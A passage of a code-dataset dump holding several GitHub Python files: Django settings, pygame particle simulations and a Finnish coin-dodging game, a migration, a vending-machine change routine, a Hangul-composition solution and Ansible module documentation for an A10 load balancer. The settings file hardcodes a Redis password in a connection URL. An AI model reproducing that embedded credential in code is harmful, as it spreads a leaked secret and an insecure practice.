\"redis://:habibie099secret@127.0.0.1:6379/0\")\n\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\nSESSION_COOKIE_AGE = 60 * 15 # Logout if inactive for 15 minutes\nSESSION_SAVE_EVERY_REQUEST = True\n\nif REDIS_URL:\n SESSION_ENGINE = \"django.contrib.sessions.backends.cached_db\"\n SESSION_CACHE_ALIAS = \"default\"\n CACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": REDIS_URL,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n },\n }\n######################################################\n# QUEUES\n######################################################\n\nREDIS_SSL = env(\"REDIS_SSL\", bool, False)\nRQ_DATABASE = 1\nRQ_URL = urlparse(REDIS_URL)\n\nRQ_QUEUES = {\n \"default\": {\n \"HOST\": RQ_URL.hostname,\n \"USERNAME\": RQ_URL.username,\n \"PASSWORD\": RQ_URL.password,\n \"PORT\": RQ_URL.port,\n \"DB\": RQ_DATABASE,\n \"SSL\": bool(REDIS_SSL),\n \"SSL_CERT_REQS\": None,\n },\n}\n\n# -----------------------------------------------------------------\n# INTERNATIONALIZATION\n# https://docs.djangoproject.com/en/3.2/topics/i18n/\n# -----------------------------------------------------------------\n\nTIME_ZONE = \"UTC\"\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nLANGUAGE_CODE = \"en\"\nLANGUAGES = [\n (\"id\", \"Indonesia\"),\n (\"en\", \"English (United States)\"),\n]\n\n# -----------------------------------------------------------------\n# STATICFILE & STORAGE\n# -----------------------------------------------------------------\n\nSTATICFILES_FINDERS = [\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n]\n\nSTATICFILES_DIRS = [os.path.join(PROJECT_DIR, \"static\")]\nSTATICFILES_STORAGE = \"django.contrib.staticfiles.storage.ManifestStaticFilesStorage\"\n\nSTATIC_ROOT = os.path.join(BASE_DIR, \"staticfiles\")\nSTATIC_URL = \"/static/\"\n\nMEDIA_ROOT = os.path.join(BASE_DIR, \"mediafiles\")\nMEDIA_URL = \"/media/\"\n\n# -----------------------------------------------------------------\n# CACHE\n# -----------------------------------------------------------------\n\nREDIS_URL = env(\"REDIS_URL\", str, default=None)\nSESSION_ENGINE = \"django.contrib.sessions.backends.db\"\n\nif REDIS_URL:\n SESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\n SESSION_CACHE_ALIAS = \"default\"\n CACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": REDIS_URL,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n },\n }\n\n\n# SENTRY\n\nSENTRY_DSN = env(\"SENTRY_DSN\", str, default=\"\")\n\nif SENTRY_DSN:\n sentry_sdk.init(\n dsn=SENTRY_DSN,\n integrations=[DjangoIntegration()],\n # Set traces_sample_rate to 1.0 to capture 100%\n # of transactions for performance monitoring.\n # We recommend adjusting this value in production.\n traces_sample_rate=1.0,\n # If you wish to associate users to errors (assuming you are using\n # django.contrib.auth) you may enable sending PII data.\n send_default_pii=True,\n )\n\nFAVICON_URL = \"/favicon.ico\"\n\nSETTINGS_EXPORT = [\n \"PAGE_CACHE_TIMEOUT\",\n \"BASE_URL\",\n \"SITE_NAME\",\n \"FAVICON_URL\",\n]\n\nSETTINGS_EXPORT_VARIABLE_NAME = \"django_settings\"\n\nTAGGIT_CASE_INSENSITIVE = True\n\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\n\nTINYMCE_DEFAULT_CONFIG = {\n \"theme\": \"silver\",\n \"height\": 300,\n \"menubar\": False,\n \"plugins\": \"advlist, autolink, lists, link, image, charmap, print, preview, anchor, table,\"\n 
\"searchreplace, visualblocks, code, fullscreen, insertdatetime , media, table, paste,\"\n \"code, help, wordcount\",\n \"toolbar\": \"undo redo | formatselect | \"\n \"bold italic backcolor | alignleft aligncenter \"\n \"alignright alignjustify | bullist numlist indent table image| \"\n \"removeformat code help\",\n}\n\nHAYSTACK_CONNECTIONS = {\n \"default\": {\n \"ENGINE\": \"haystack.backends.whoosh_backend.WhooshEngine\",\n \"PATH\": os.path.join(BASE_DIR, \"search\"),\n \"STORAGE\": \"file\",\n \"POST_LIMIT\": 128 * 1024 * 1024,\n \"INCLUDE_SPELLING\": True,\n \"BATCH_SIZE\": 100,\n # 'EXCLUDED_INDEXES': ['thirdpartyapp.search_indexes.BarIndex'],\n },\n}\n\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n },\n },\n \"root\": {\n \"handlers\": [\"console\"],\n \"level\": \"WARNING\",\n },\n \"django.request\": {\"handlers\": [\"console\"], \"level\": \"ERROR\", \"propagate\": True},\n}\n","repo_name":"justsasri/simpel-pages-heroku","sub_path":"server/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3688039740","text":"\"\"\"\nimport pygame\nimport random\nimport numpy as np\nimport math\n\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\nyellow = (255, 255, 0)\ncyan = (0, 255, 255)\nmagenta = (255, 0, 255)\n\nradius = 5\n\nred_particles = []\n\ncyan_particles = []\n\"\"\"\n\"\"\"\n# importing the required libraries\nimport pygame\nfrom pygame.locals import *\nimport random\nimport math\n\nclass Particle:\n def __init__(self, running, width, height, color):\n # initialising pygame\n pygame.init()\n self.width = width\n self.height = height\n self.screen = pygame.display.set_mode((self.width, self.height))\n\n pygame.display.set_caption(\"Particle Life\") # setting title\n self.screen.fill(color)\n\n pygame.display.update()\n self.running = running\n\n # initialising clock\n self.clock = pygame.time.Clock()\n\n # colors\n self.blue = (0, 0, 255)\n self.red = (255, 0, 0)\n self.green = (0, 255, 0)\n self.yellow = (255, 255, 0)\n\n # function to create\n # one particle on the scree\n\n def createParticle(self, x, y, color):\n pygame.draw.rect(self.screen, color, (x, y, 2, 2))\n\n # returns a dict\n\n def returnParticle(self, x, y, color, vx, vy):\n return {\"x\": x, \"y\": y, \"color\": color, \"vx\": vx, \"vy\": vy}\n\n # returns a list consisting\n # of all the necessary things\n\n def manyParticles(self, number, color):\n group = []\n for i in range(number):\n x = random.randint(1, self.width-1)\n y = random.randint(1, self.height-1)\n vx = 0\n vy = 0\n\n group.append(self.returnParticle(x, y, color, vx, vy))\n return group\n\n # the function to create\n # many particles\n\n def createParticles(self, particles):\n for particle in particles:\n self.createParticle(\n particle[\"x\"], particle[\"y\"], particle[\"color\"])\n\n # this is the mainrule function\n # which follows F = GMm/r^2\n # and this will move the particles towards each other\n # and also coordinate geometry = squareroot[(x2-x1)^2 + (y2-y1)^2]\n # and also F = ma\n\n def mainRule(self, particles1, particles2, g):\n # first iterating over all the particles in the particles1\n for i in range(len(particles1)):\n # setting the force to be applied\n # in the x and y coordinates\n fx = 0\n fy = 0\n\n # now iterating over the particles2\n for j in range(len(particles2)):\n a = 
particles1[i]\n                b = particles2[j]\n                dx = a[\"x\"]-b[\"x\"]\n                dy = a[\"y\"]-b[\"y\"]\n                # using coordinate geometry to find the distance between two particles\n                d = math.sqrt(dx*dx+dy*dy)\n                if (d > 0):\n                    F = g*1/d\n                    fx += (F*dx)\n                    fy += (F*dy)\n\n            a[\"vx\"] = (a[\"vx\"] + fx)*0.5\n            a[\"vy\"] = (a[\"vy\"] + fy)*0.5\n            # due to the force applied\n            # the particles also undergo acceleration\n            # so the position is updated from the velocity set by the force formula\n            a[\"x\"] += a[\"vx\"]\n            a[\"y\"] += a[\"vy\"]\n\n            # now reversing the particles\n            # when they hit the wall\n            if (a[\"x\"] <= 0 or a[\"x\"] >= 700):\n                a[\"vx\"] *= -1\n            elif (a[\"y\"] <= 0 or a[\"y\"] >= 500):\n                a[\"vy\"] *= -1\n        self.screen.fill(0)\n\n    # the main loop\n\n    def gameLoop(self):\n        # defining particles\n        self.yellowParticles = self.manyParticles(200, self.yellow)\n        self.redParticles = self.manyParticles(200, self.red)\n        self.greenParticles = self.manyParticles(200, self.green)\n        self.blueParticles = self.manyParticles(200, self.blue)\n\n        while self.running:\n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    self.running = False\n            # creating the particles\n            self.createParticles(self.yellowParticles)\n            self.createParticles(self.redParticles)\n            self.createParticles(self.greenParticles)\n            self.createParticles(self.blueParticles)\n\n            # updating the display\n            pygame.display.update()\n\n            # enter your rules here\n            # defining the rules\n            self.mainRule(self.yellowParticles, self.yellowParticles, -0.1)\n\n            self.clock.tick(78)\n        pygame.quit()\n\n# the main function\n\n\ndef main():\n    particleLife = Particle(True, 700, 500, (0, 0, 0))\n    particleLife.gameLoop()\n\n\nif __name__ == \"__main__\":\n    main()\n\n\"\"\"\n## A simple Python port - You need: pip install pygame. Note the code here is not efficient but it's made to be educational and easy\nimport pygame\nimport random\nimport math\n\natoms=[]\nwindow_size = 300\npygame.init()\nwindow = pygame.display.set_mode((1920, 1080))\n#deltaTime = pygame.time.get_ticks()\n\n\ndef draw(surface, x, y, color, radius):\n    # one filled circle is enough; the original loop redrew the same circle radius times\n    pygame.draw.circle(surface, color, (x, y), radius)\n \ndef atom(x, y, c):\n    return {\"x\": x, \"y\": y, \"vx\": 0, \"vy\": 0, \"color\": c}\n\ndef randomxy(limit):\n    # spawn inside the window; the display is 1920x1080, not square\n    return round(random.random()*(limit - 2) + 1)\n\ndef create(number, color):\n    group = []\n    for i in range(number):\n        group.append(atom(randomxy(1920), randomxy(1080), color))\n        atoms.append((group[i])) #all particles\n    return group\n\n\ndef rule(atoms1, atoms2, g):\n    for i in range(len(atoms1)):\n        fx = 0\n        fy = 0\n        for j in range(len(atoms2)):\n            a = atoms1[i]\n            b = atoms2[j]\n            dx = a[\"x\"] - b[\"x\"]\n            dy = a[\"y\"] - b[\"y\"]\n            d = (dx*dx + dy*dy)**0.5\n            if( d > 0 and d < 80):\n                F = g/d\n                fx += F*dx\n                fy += F*dy\n        a[\"vx\"] = (a[\"vx\"] + fx)*0.5\n        a[\"vy\"] = (a[\"vy\"] + fy)*0.5\n        a[\"x\"] += a[\"vx\"]\n        a[\"y\"] += a[\"vy\"]\n        if(a[\"x\"] <= 0 or a[\"x\"] >= 1920):\n            a[\"vx\"] *=-1\n        if(a[\"y\"] <= 0 or a[\"y\"] >= 1080):\n            a[\"vy\"] *=-1 \n\n\n\"\"\" def rule2(atoms1, atoms2):\n    for i in range(len(atoms1)):\n        for j in range(len(atoms2)):\n            pA = atoms1[i]\n            pB = atoms2[j]\n            dx = pA[\"x\"] - pB[\"x\"]\n            dy = pA[\"y\"] - pB[\"y\"]\n            r = math.sqrt(dx**2 + dy**2)\n            if r < 20:\n                t = pygame.time.get_ticks() - deltaTime\n                pA[\"x\"] += math.sin(t) + 5\n                pA[\"y\"] += math.sin(t) + 5\n            elif r > 20:\n                pass \"\"\"\n\n\n\ncyan = create(200, \"cyan\")\nmagenta = create(200, \"magenta\")\n#white = create(200, \"white\")\n\n\nrun = True\nwhile run:\n    window.fill(0)\n    rule(magenta, magenta, 14)\n    rule(magenta, cyan, -15)\n    
rule(cyan, cyan, -200)\n    for i in range(len(atoms)):\n        draw(window, atoms[i][\"x\"], atoms[i][\"y\"], atoms[i][\"color\"], 2)\n    \n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            run = False\n    pygame.display.flip()\npygame.quit()\nexit()\n","repo_name":"MattMattL/HackNotts-23","sub_path":"particles/fairuz_particle copy.py","file_name":"fairuz_particle copy.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"3634732015","text":"# BUILD THE GAME HERE\n\n'''\nRICH AT THE RISK OF DEATH\n\nIn the game you collect money and dodge monsters.\n\nThe robot is moved left and right with the arrow keys.\n\nThe game is won by collecting 5 coins and lost by touching a monster.\n\nYou can make the game harder by\n- increasing the speed (default 2.5)\n- adding monsters (default roughly 1 monster / 80 ticks)\n- reducing the coins (default roughly 1 coin / 120 ticks)\n'''\n\n########################################################################\n# difficulty tuning\n'''tune the game harder if you wish, following the notes below'''\n\n# the faster, the harder. e.g. 3 is already quite fast\nnopeus=2.5\n# the smaller the number, the more monsters. E.g. 50 already spawns a lot of monsters\nmonsterimaara=80\n# the larger the number, the fewer the coins. E.g. 160 is fairly sparse\nrahamaara=120\n\n########################################################################3\n#Packages and paths\n\n#import packages\nimport random\nimport pygame\nimport os\n\n#this makes sure the working directory is the one this file lives in\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n\n###########################################################################33\n# initialize the game, the display and the sprites\n\npygame.init()\nw_d, h_d = 640, 480\nnaytto = pygame.display.set_mode((w_d, h_d))\n\n##robot setup\nrobo = pygame.image.load(\"robo.png\") \nh_r=robo.get_height()\nw_r=robo.get_width()\nx_r = w_d/2-w_r\ny_r = h_d-h_r\n\n##monster setup\nmonsterX = pygame.image.load(\"hirvio.png\") \nh_m=monsterX.get_height() \nw_m=monsterX.get_width() \n\n##coin setup (kivi = coin)\nkivi = pygame.image.load('kolikko.png') \nh_k=kivi.get_height()\nw_k=kivi.get_width()\n\n\n##################################################################\n## helper classes and functions for the individual objects\n\n# the same class is used for coins and monsters (and, earlier, rocks)\nclass Kivi:\n    def __init__(self):\n        self.x=random.randint(0,w_d-w_k)\n        self.y=-h_k\n        self.x_suunta=0\n        self.y_suunta=1\n        self.onko_ollut_pohjalla=False\n\n    def __repr__(self):\n        return f'x {self.x} y {self.y} x_suunta {self.x_suunta} y_suunta {self.y_suunta} pohjalla {self.onko_ollut_pohjalla}'\n\n# moves an object that is falling down from the sky\ndef move_kivi(ME:Kivi):\n    ME.y += ME.y_suunta\n    ME.x += ME.x_suunta\n    if ME.y-h_k >= h_d:\n        if ME.onko_ollut_pohjalla==False:\n            ME.onko_ollut_pohjalla=True\n\n# draw a coin\ndef display_kivi(ME:Kivi):\n    naytto.blit(kivi, (ME.x, ME.y))\n\n# draw a monster\ndef display_monsteri(ME:Kivi):\n    naytto.blit(monsterX, (ME.x, ME.y)) \n\n##################################################################\n# initialize 
program state\ngame_over=False\nvictory=False\nkivi_list=[]\nmonsteri_list=[]\noikealle = False\nvasemmalle = False\npisteet=0\nkello = pygame.time.Clock()\n\n# run the program\nwhile True:\n    for tapahtuma in pygame.event.get():\n        if tapahtuma.type == pygame.KEYDOWN:\n            if tapahtuma.key == pygame.K_LEFT:\n                vasemmalle = True\n            if tapahtuma.key == pygame.K_RIGHT:\n                oikealle = True\n\n        if tapahtuma.type == pygame.KEYUP:\n            if tapahtuma.key == pygame.K_LEFT:\n                vasemmalle = False\n            if tapahtuma.key == pygame.K_RIGHT:\n                oikealle = False\n\n        if tapahtuma.type == pygame.QUIT:\n            exit()\n\n    #move the robot right or left depending on which arrow key is held down\n    if oikealle:\n        if x_r < w_d - w_r:\n            x_r += 3\n    if vasemmalle:\n        if x_r > 0:\n            x_r -= 3\n\n    # roll each tick whether a new coin appears\n    if random.randint(0,rahamaara)==1:\n        kivi_list.append(Kivi())\n\n    #roll each tick whether a new monster appears\n    if random.randint(0,monsterimaara)==2:\n        monsteri_list.append(Kivi())\n\n    # drop the falling objects that have passed the ground\n    kivi_list = [x for x in kivi_list if x.onko_ollut_pohjalla==False]\n    monsteri_list = [x for x in monsteri_list if x.onko_ollut_pohjalla==False]\n\n    # move the coins and the monsters down\n    for stone in kivi_list:\n        move_kivi(stone)\n\n    for monsteri in monsteri_list:\n        move_kivi(monsteri)\n\n    # check for coin pickups and add points\n    drop_indices=[]\n    for i,stone in enumerate(kivi_list):\n        if (x_r-w_k <= stone.x <= x_r+w_r) and (y_r-h_k <= stone.y <= y_r+h_r):\n            drop_indices.append(i)\n            pisteet+=1\n\n    # remove the coins that were picked up\n    kivi_list = [j for i, j in enumerate(kivi_list) if i not in drop_indices]\n\n    # check for a monster hit and set the game_over flag if needed\n    for i,monster in enumerate(monsteri_list):\n        if (x_r-w_m <= monster.x <= x_r+w_r) and (y_r-h_m <= monster.y <= y_r+h_r): #NB!\n            game_over=True\n            break\n\n    # clear the coins and monsters once the game has ended\n    if game_over==True or victory==True:\n        kivi_list=[]\n        monsteri_list=[]\n\n    # set up the texts\n    ## score text\n    fontti = pygame.font.SysFont(\"Arial\", 24)\n    teksti = fontti.render(f'Points: {pisteet}', True, (255, 0, 0))\n\n    ## losing texts\n    fontti_game_over = pygame.font.SysFont(\"Arial\", 70)\n    teksti_game_over = fontti_game_over.render(f'Game over!', True, (255, 0, 0))\n\n    ##victory texts\n    teksti_victory1 = fontti_game_over.render(f'You won!', True, (255, 0, 0))\n    teksti_victory2 = fontti.render(f'You grabbed {pisteet} coins, you are rich. 
Congratulations.', True, (255, 0, 0))\n\n    # with 5 (or more) points the game is won\n    if pisteet>=5:\n        victory=True\n\n    ########################\n    # draw the frame's graphics to the display\n    naytto.fill((72,61,139))\n    pygame.display.set_caption('Rich at the risk of death')\n    if game_over==True:\n        naytto.blit(teksti_game_over, (w_d/2-160, h_d/2-80))\n        naytto.blit(teksti, (w_d/2-50, h_d/2+50))\n\n    elif victory==True:\n        naytto.blit(teksti_victory1, (w_d/2-160, h_d/2-80))\n        naytto.blit(teksti_victory2, (100, h_d/2+50))\n\n    else: \n        for x in kivi_list:\n            display_kivi(x)\n        for x in monsteri_list:\n            display_monsteri(x)\n        naytto.blit(teksti, (w_d-120, 0))\n\n    naytto.blit(robo, (x_r, y_r))\n    pygame.display.flip()\n    kello.tick(60*nopeus)","repo_name":"sami-one/mooc-ohjelmointi-21","sub_path":"osa14-01_pelin_palautus/src/arviointi.py","file_name":"arviointi.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"fi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"19731371904","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('base', '0003_auto_20150311_1336'),\n    ]\n\n    operations = [\n        migrations.AlterModelOptions(\n            name='task',\n            options={'ordering': ['-status', 'priority', 'progress'], 'verbose_name': '\\u9879\\u76ee\\u4efb\\u52a1\\u4fe1\\u606f', 'verbose_name_plural': '\\u9879\\u76ee\\u4efb\\u52a1\\u4fe1\\u606f'},\n        ),\n        migrations.AlterField(\n            model_name='task',\n            name='description',\n            field=models.TextField(help_text=b'issue \\xe5\\x86\\x85\\xe5\\xae\\xb9', max_length=100, verbose_name='\\u8be6\\u60c5'),\n            preserve_default=True,\n        ),\n        migrations.AlterField(\n            model_name='task',\n            name='due_date',\n            field=models.DateTimeField(help_text=b'\\xe5\\xae\\x8c\\xe6\\x88\\x90\\xe6\\x97\\xa5\\xe6\\x9c\\x9f', null=True, verbose_name='\\u5b8c\\u6210\\u65e5\\u671f', blank=True),\n            preserve_default=True,\n        ),\n        migrations.AlterField(\n            model_name='task',\n            name='plan_date',\n            field=models.DateTimeField(help_text=b'\\xe4\\xbb\\xbb\\xe5\\x8a\\xa1\\xe6\\x88\\xaa\\xe6\\xad\\xa2\\xe6\\x97\\xa5\\xe6\\x9c\\x9f', null=True, verbose_name='\\u622a\\u6b62\\u65e5\\u671f', blank=True),\n            preserve_default=True,\n        ),\n        migrations.AlterField(\n            model_name='task',\n            name='progress',\n            field=models.IntegerField(default=0, help_text=b'%', max_length=2, verbose_name='\\u8fdb\\u5ea6'),\n            preserve_default=True,\n        ),\n    ]\n","repo_name":"sparrowu93/django-ProjectManagement","sub_path":"base/migrations/0004_auto_20150318_1602.py","file_name":"0004_auto_20150318_1602.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"38896906359","text":"\"\"\"\nA virtual vending machine.\n\"\"\"\n# A list of coins allowed\nACCEPTABLE_COINS = [1000, 500, 200, 100, 20, 10, 5, 2, 1]\n\n\ndef return_change(balance):\n    \"\"\"\n    Returns balance in coins.\n    \"\"\"\n    change = []\n\n    while balance > 0:\n        # take the largest coin that divides the remaining balance evenly\n        for coin in ACCEPTABLE_COINS:\n            if balance % coin == 0:\n                change.append(coin)\n                balance -= coin\n                break\n\n    return sorted(change, 
reverse=True)\n","repo_name":"heenabaheti/python-programs","sub_path":"junit_testing_programs/vending_mach.py","file_name":"vending_mach.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7054784559","text":"# Problem No.: 11285\r\n# Solver: Jinmin Goh\r\n# Date: 20220811\r\n# URL: https://www.acmicpc.net/problem/11285\r\n\r\nimport sys\r\n\r\ndef main():\r\n first_word = input().rstrip()\r\n middle_word = input().rstrip()\r\n last_word = input().rstrip()\r\n first_list = ['ㄱ', 'ㄲ', 'ㄴ', 'ㄷ', 'ㄸ', 'ㄹ', 'ㅁ', 'ㅂ', 'ㅃ', 'ㅅ', 'ㅆ', 'ㅇ', 'ㅈ', 'ㅉ', 'ㅊ', 'ㅋ', 'ㅌ', 'ㅍ', 'ㅎ']\r\n middle_list = ['ㅏ', 'ㅐ', 'ㅑ', 'ㅒ', 'ㅓ', 'ㅔ', 'ㅕ', 'ㅖ', 'ㅗ', 'ㅘ', 'ㅙ', 'ㅚ', 'ㅛ', 'ㅜ', 'ㅝ', 'ㅞ', 'ㅟ', 'ㅠ', 'ㅡ', 'ㅢ', 'ㅣ']\r\n last_list = ['', 'ㄱ', 'ㄲ', 'ㄳ', 'ㄴ', 'ㄵ', 'ㄶ', 'ㄷ', 'ㄹ', 'ㄺ', 'ㄻ', 'ㄼ', 'ㄽ', 'ㄾ', 'ㄿ', 'ㅀ', 'ㅁ', 'ㅂ', 'ㅄ', 'ㅅ', 'ㅆ', 'ㅇ', 'ㅈ', 'ㅊ', 'ㅋ', 'ㅌ', 'ㅍ', 'ㅎ']\r\n \r\n first_idx = first_list.index(first_word)\r\n middle_idx = middle_list.index(middle_word)\r\n last_idx = last_list.index(last_word)\r\n idx = first_idx * (len(middle_list) * len(last_list)) + middle_idx * len(last_list) + last_idx + 44032\r\n print(chr(idx))\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/11285/11285.py","file_name":"11285.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86415314294","text":"REQUIRED_NOT_SET = (False, \"One of ({}) must be set.\")\nREQUIRED_MUTEX = (False, \"Only one of ({}) can be set.\")\nREQUIRED_VALID = (True, \"\")\n\nDOCUMENTATION = r'''\nmodule: a10_slb_fast_http_proxy\ndescription:\n - Configure Fast-HTTP Proxy\nauthor: A10 Networks\noptions:\n state:\n description:\n - State of the object to be created.\n choices:\n - noop\n - present\n - absent\n type: str\n required: True\n ansible_host:\n description:\n - Host for AXAPI authentication\n type: str\n required: True\n ansible_username:\n description:\n - Username for AXAPI authentication\n type: str\n required: True\n ansible_password:\n description:\n - Password for AXAPI authentication\n type: str\n required: True\n ansible_port:\n description:\n - Port for AXAPI authentication\n type: int\n required: True\n a10_device_context_id:\n description:\n - Device ID for aVCS configuration\n choices: [1-8]\n type: int\n required: False\n a10_partition:\n description:\n - Destination/target partition for object/command\n type: str\n required: False\n uuid:\n description:\n - \"uuid of the object\"\n type: str\n required: False\n sampling_enable:\n description:\n - \"Field sampling_enable\"\n type: list\n required: False\n suboptions:\n counters1:\n description:\n - \"'all'= all; 'num'= Num; 'curr_proxy'= Curr Proxy Conns; 'total_proxy'= Total\n Proxy Conns; 'req'= HTTP requests; 'req_succ'= HTTP requests(succ); 'noproxy'=\n No proxy error; 'client_rst'= Client RST; 'server_rst'= Server RST; 'notuple'=\n No tuple error; 'parsereq_fail'= Parse req fail; 'svrsel_fail'= Server\n selection fail; 'fwdreq_fail'= Fwd req fail; 'fwdreq_fail_buff'= Fwd req fail -\n buff; 'fwdreq_fail_rport'= Fwd req fail - rport; 'fwdreq_fail_route'= Fwd req\n fail - route; 'fwdreq_fail_persist'= Fwd req fail - persist;\n 'fwdreq_fail_server'= Fwd req fail - server; 'fwdreq_fail_tuple'= Fwd req fail\n - tuple; 'fwdreqdata_fail'= Fwd req data fail; 'req_retran'= Packets retrans;\n 'req_ofo'= Packets ofo; 'server_resel'= 
Server reselection; 'svr_prem_close'=\n Server premature close; 'new_svrconn'= Server conn made; 'snat_fail'= Source\n NAT failure; 'tcpoutrst'= Out RSTs; 'full_proxy'= Full proxy tot;\n 'full_proxy_post'= Full proxy POST; 'full_proxy_pipeline'= Full proxy pipeline;\n 'full_proxy_fpga_err'= Full proxy fpga err; 'req_over_limit'= Request over\n limit; 'req_rate_over_limit'= Request rate over limit; 'l4_switching'= L4\n switching; 'cookie_switching'= Cookie switching; 'aflex_switching'= aFleX\n switching; 'http_policy_switching'= HTTP Policy switching; 'url_switching'= URL\n switching; 'host_switching'= Host switching; 'lb_switching'= Normal LB\n switching; 'l4_switching_ok'= L4 switching (succ); 'cookie_switching_ok'=\n Cookie switching (succ); 'aflex_switching_ok'= aFleX switching (succ);\n 'http_policy_switching_ok'= HTTP Policy switching (succ); 'url_switching_ok'=\n URL switching (succ); 'host_switching_ok'= Host switching (succ);\n 'lb_switching_ok'= Normal LB switch. (succ); 'l4_switching_enqueue'= L4\n switching (enQ); 'cookie_switching_enqueue'= Cookie switching (enQ);\n 'aflex_switching_enqueue'= aFleX switching (enQ);\n 'http_policy_switching_enqueue'= HTTP Policy switching (enQ);\n 'url_switching_enqueue'= URL switching (enQ); 'host_switching_enqueue'= Host\n switching (enQ); 'lb_switching_enqueue'= Normal LB switch. (enQ); 'retry_503'=\n Retry on 503; 'aflex_retry'= aFleX http retry; 'aflex_lb_reselect'= aFleX lb\n reselect; 'aflex_lb_reselect_ok'= aFleX lb reselect (succ);\n 'client_rst_request'= Client RST - request; 'client_rst_connecting'= Client RST\n - connecting; 'client_rst_connected'= Client RST - connected;\n 'client_rst_response'= Client RST - response; 'server_rst_request'= Server RST\n - request; 'server_rst_connecting'= Server RST - connecting;\n 'server_rst_connected'= Server RST - connected; 'server_rst_response'= Server\n RST - response; 'invalid_header'= Invalid header; 'too_many_headers'= Too many\n headers; 'line_too_long'= Line too long; 'header_name_too_long'= Header name\n too long; 'wrong_resp_header'= Wrong response header; 'header_insert'= Header\n insert; 'header_delete'= Header delete; 'insert_client_ip'= Insert client IP;\n 'negative_req_remain'= Negative request remain; 'negative_resp_remain'=\n Negative response remain; 'large_cookie'= Large cookies; 'large_cookie_header'=\n Large cookie headers; 'huge_cookie'= Huge cookies; 'huge_cookie_header'= Huge\n cookie headers; 'parse_cookie_fail'= Parse cookie fail; 'parse_setcookie_fail'=\n Parse set-cookie fail; 'asm_cookie_fail'= Assemble cookie fail;\n 'asm_cookie_header_fail'= Asm cookie header fail; 'asm_setcookie_fail'=\n Assemble set-cookie fail; 'asm_setcookie_header_fail'= Asm set-cookie hdr fail;\n 'client_req_unexp_flag'= Client req unexp flags; 'connecting_fin'= Connecting\n FIN; 'connecting_fin_retrans'= Connecting FIN retran; 'connecting_fin_ofo'=\n Connecting FIN ofo; 'connecting_rst'= Connecting RST; 'connecting_rst_retrans'=\n Connecting RST retran; 'connecting_rst_ofo'= Connecting RST ofo;\n 'connecting_ack'= Connecting ACK; 'pkts_ofo'= Packets ofo; 'pkts_retrans'=\n Packets retrans; 'pkts_retrans_ack_finwait'= retrans ACK FWAIT;\n 'pkts_retrans_fin'= retrans FIN; 'pkts_retrans_rst'= retrans RST;\n 'pkts_retrans_push'= retrans PSH; 'stale_sess'= Stale sess;\n 'server_resel_failed'= Server re-select failed; 'compression_before'= Tot data\n before compress; 'compression_after'= Tot data after compress; 'response_1xx'=\n Status code 1XX; 'response_100'= Status code 100; 'response_101'= 
Status code\n 101; 'response_102'= Status code 102; 'response_2xx'= Status code 2XX;\n 'response_200'= Status code 200; 'response_201'= Status code 201;\n 'response_202'= Status code 202; 'response_203'= Status code 203;\n 'response_204'= Status code 204; 'response_205'= Status code 205;\n 'response_206'= Status code 206; 'response_207'= Status code 207;\n 'response_3xx'= Status code 3XX; 'response_300'= Status code 300;\n 'response_301'= Status code 301; 'response_302'= Status code 302;\n 'response_303'= Status code 303; 'response_304'= Status code 304;\n 'response_305'= Status code 305; 'response_306'= Status code 306;\n 'response_307'= Status code 307; 'response_4xx'= Status code 4XX;\n 'response_400'= Status code 400; 'response_401'= Status code 401;\n 'response_402'= Status code 402; 'response_403'= Status code 403;\n 'response_404'= Status code 404; 'response_405'= Status code 405;\n 'response_406'= Status code 406; 'response_407'= Status code 407;\n 'response_408'= Status code 408; 'response_409'= Status code 409;\n 'response_410'= Status code 410; 'response_411'= Status code 411;\n 'response_412'= Status code 412; 'response_413'= Status code 413;\n 'response_414'= Status code 414; 'response_415'= Status code 415;\n 'response_416'= Status code 416; 'response_417'= Status code 417;\n 'response_418'= Status code 418; 'response_422'= Status code 422;\n 'response_423'= Status code 423; 'response_424'= Status code 424;\n 'response_425'= Status code 425; 'response_426'= Status code 426;\n 'response_449'= Status code 449; 'response_450'= Status code 450;\n 'response_5xx'= Status code 5XX; 'response_500'= Status code 500;\n 'response_501'= Status code 501; 'response_502'= Status code 502;\n 'response_503'= Status code 503; 'response_504'= Status code 504;\n 'response_505'= Status code 505; 'response_506'= Status code 506;\n 'response_507'= Status code 507; 'response_508'= Status code 508;\n 'response_509'= Status code 509; 'response_510'= Status code 